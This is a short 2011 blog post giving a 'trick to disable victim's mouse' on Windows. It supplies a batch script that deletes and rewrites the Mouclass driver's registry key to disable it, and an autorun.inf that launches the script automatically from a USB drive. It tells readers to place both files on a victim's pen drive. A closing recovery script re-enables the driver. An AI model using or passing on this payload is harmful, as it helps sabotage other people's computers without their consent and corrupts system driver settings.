Tuesday, December 13, 2011

Trick to Disable Victim's Mouse


Step1: Copy the Batch code into notepad.


Save it as .bat extension (for eg: filename.bat)

NOTE: remove ";" at the end of each code n den save

@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass";
reg delete %key%;
reg add %key% /v Start /t REG_DWORD /d 4;


Step2: Now open the notepad and copy this code.

Save above code as "autorun.inf"

[autorun]
Open=filename.bat
Action=Mouse Disable


Step 3: Then copy the two files in your pen drive or victim's pen drive.


*How to recover from this attack?

Copy this code into the notepad.
and save it with .bat extension(for eg: filename.bat).

Now final step is to double click this batch file.

NOTE: remove ";" at the end of each code n den save

@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass";
reg delete %key%;
reg add %key% /v Start /t REG_DWORD /d 1;

No comments:

Post a Comment